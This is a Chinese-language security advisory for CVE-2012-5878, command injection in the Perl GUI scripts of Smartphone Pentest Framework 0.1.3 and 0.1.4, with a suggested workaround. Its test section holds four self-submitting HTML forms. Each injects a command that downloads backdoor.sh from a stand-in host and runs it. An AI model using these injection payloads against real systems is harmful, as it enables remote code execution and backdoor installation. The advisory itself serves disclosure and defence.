发布日期:2012-12-10
更新日期:2012-12-12受影响系统:
bulbsecurity Smartphone Pentest Framework 0.1.4
bulbsecurity Smartphone Pentest Framework 0.1.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56881
CVE(CAN) ID: CVE-2012-5878Smartphone Pentest Framework (SPF)是开源的智能手机渗透测试框架。Smartphone Pentest Framework 0.1.3、0.1.4及其他版本"/frameworkgui/"目录内的多个Perl脚本没有对system()函数的参数进行合法性检查,攻击者通过精心构造的请求即能以web server的权限执行任意系统命令。1)SEAttack.pl存在漏洞,没有检查"hostingPath"参数值的合法性。2)CSAttack.pl存在漏洞,没有检查"hostingPath"参数值的合法性。3)attachMobileModem.pl存在漏洞,没有检查"appURLPath"参数值的合法性。4)guessPassword.pl存在漏洞,没有检查"ipAddressTB"参数值的合法性。<*来源:High-Tech Bridge
链接:http://seclists.org/bugtraq/2012/Dec/74?utm_source=twitterfeed&utm_medium=twitter
https://www.htbridge.com/advisory/HTB23122
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!1.<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl"
method="post" name=f1>
<input type="hidden" name="platformDD2" value="Android" />
<input type="hidden" name="hostingPath" value="a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch &&
./backdoor.sh & " />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>2.<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl"
method="post" name=f1>
<input type="hidden" name="hostingPath" value="a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & " />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>3.<form
action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl"
method="post" name=f1>
<input type="hidden" name="appURLPath" value="a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & " />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>4.<form
action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl"
method="post" name=f1>
<input type="hidden" name="ipAddressTB" value="a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & " />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>建议:
--------------------------------------------------------------------------------
临时解决方法:删除或禁用SPF的GUI。厂商补丁:bulbsecurity
------------
虽然2012年12月5日,vendor发布了补丁,但是0.1.4版本还是存在漏洞,请使用我们推荐的临时处理办法,厂商参考链接:http://www.bulbsecurity.com/smartphone-pentest-framework/Havalite CMS "data/havalite.db3"文件数据库信息泄露漏洞Cisco DPC2420模块配置文件泄露/持续性XSS/身份验证弱加密漏洞相关资讯 远程命令执行漏洞
- Narcissus远程命令执行漏洞 (12/04/2012 06:52:44)
- Webmin /file/show.cgi远程命令执 (10/24/2012 11:53:43)
- Toshiba ConfigFree "CF7"文件远程 (09/25/2012 06:38:48)
| - Cisco WAG120N多个远程命令执行漏 (11/24/2012 11:44:52)
- QNX QCONN远程命令执行漏洞 (10/18/2012 06:17:18)
- GIMP远程命令执行漏洞 (08/21/2012 06:33:42)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意
|
易网时代-编程资源站